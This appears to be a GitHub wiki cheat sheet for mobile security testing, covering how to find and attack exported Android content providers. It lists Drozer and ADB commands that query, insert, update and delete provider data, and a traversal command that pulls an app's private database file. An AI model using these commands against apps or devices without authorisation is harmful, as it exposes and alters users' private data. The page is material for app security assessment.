Attacking Content Providers

Content providers allow stored data to be accessed and modified by other apps.

Enumeration

AndroidManifest.xml
Find all content providers defined
Is android:exported="true" set?
Is data protected by a permission tag?
What is the android:protectionlevel set to?

Drozer

Drozer will enumerate content provders when running the following:

run app.provider.info -a com.your.app

The output will show:

Content provider name
Path
Path Permissions
Read Permissions
Write Permissions

You can also run the following which will find content URIs:

run scanner.provider.finduris -a com.your.app

The output would be like:

content://com.you.app.ContentProvider/Key/

Query with ADB

adb shell content query -uri content://foo/bar

Query with Drozer

run app.provider.query content://com.your.app.contentProvider/key --vertical

run app.provider.insert content://com.your.app.contentProvider/key --string

run app.provider.update content://com.your.app.contentProvider/key --selection

run app.provider.delete content://com.your.app.contentProvider/key --selection

Projection vs Selection

Projection - Columns
Selection - Rows

Directory Traversal Weakneses

A content provider may be abused to read and download files

run scanner.provider.traversal -a com.your.app

run app.provider.download content://com.your.app.contentProvider/../../../data/data/com.your.app/database.db /home/user/database.db

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Attacking Content Providers

Enumeration

Drozer

Query with ADB

Query with Drozer

Projection vs Selection

Directory Traversal Weakneses

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Clone this wiki locally